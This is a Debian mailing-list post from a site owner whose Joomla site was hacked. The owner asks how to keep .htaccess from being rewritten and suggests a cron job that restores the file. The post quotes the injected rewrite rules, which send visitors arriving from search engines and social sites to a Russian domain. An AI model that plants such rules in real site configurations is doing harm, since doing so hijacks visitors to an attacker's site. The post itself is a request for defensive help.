Dear debianusers,

Does anyone knows how to protect against unauthorized change of .htaccess?

I googled the "htttp://reltime2012.ru/frunleh?9 redirect problem" and
found out that a lot of sites (mainly using wordpress) got hacked and
is redirected to a russian site.

One of my sites, that has joomla (and not wordpress) also got hacked (again).

In the beginning of the .htaccess one can read:

RewriteCond %{HTTP_REFERER}
^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|aol|goto|infoseek|lycos|search|bing|dogpile|facebook|twitter|live|myspace|linkedin|flickr)\.(.*)
RewriteRule ^(.*)$ htttp://reltime2012.ru/frunleh?9 [R=301,L]



I find some tutorials on how to fix the problem,

http://newmediamike.com/2012/07/reltime-2012-frunleh-redirection/

http://wptrainingonline.com/

But none of them explains how to protect and prevent the problem to
happen again. This google's forum has a post stating that

http://productforums.google.com/forum/#!topic/webmasters/GsB423gsIlk

" the sysadmin told me that there was a php script entitled
"jos_jpxn.php" running that was rewriting my .htaccess" (lickface)

But I found no such script among my files.

(Of course, I changed my password, but I don't really think that is
the problem...)


I know it is easy to fix. I just wonder if I can prevent that to
happen again. I'm considering to simple put a "cron job" that rewrites
my .htaccess from time to time! :)

Anyone else saw this problem?

Thanks,
Beco






-- 
Dr. Beco
A.I. research, Cognitive Scientist and Philosopher
Linux Counter #201942


-- 
To UNSUBSCRIBE, email to debian-user-requ...@lists.debian.org 
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Archive: 
http://lists.debian.org/caluyw2xm0z0ebijgexpjyh0npklxaj11eb4idyatoxvuw6m...@mail.gmail.com

Reply via email to